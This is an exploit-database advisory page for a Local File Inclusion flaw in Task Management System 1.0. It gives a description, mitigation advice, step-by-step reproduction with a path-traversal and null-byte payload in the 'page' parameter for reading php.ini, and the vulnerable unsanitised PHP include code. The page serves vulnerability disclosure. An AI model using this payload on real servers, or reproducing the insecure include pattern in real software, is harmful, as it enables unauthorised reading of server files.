header-logo
Suggest Exploit
vendor:
Task Management System
by:
İsmail BOZKURT
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Task Management System
Affected Version From: Version 1
Affected Version To: Version 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x86_64
2020

Task Management System 1.0 – ‘page’ Local File Inclusion

Task Management System 1.0 is vulnerable to Local File Inclusion (LFI) due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a maliciously crafted URL to the application. By manipulating the 'page' parameter, an attacker can include a file from the local system. This can be used to read sensitive files from the server, such as the php.ini file. This vulnerability affects version 1 of the application and is tested on Windows 10 x86_64.

Mitigation:

Input validation should be used to prevent the inclusion of maliciously crafted URLs. The application should also be configured to only allow the inclusion of files from a specific directory.
Source

Exploit-DB raw data:

# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=index
Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00

Note: php version < 5.3.3

section class="content">
    <div class="container-fluid">
    <?php 
    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
	    if(!file_exists($page.".php")){
	    include '404.html';
	    }else{
	    include $page.'.php';
    }
    ?>

Navigation

Suggest Exploit

Services By CQR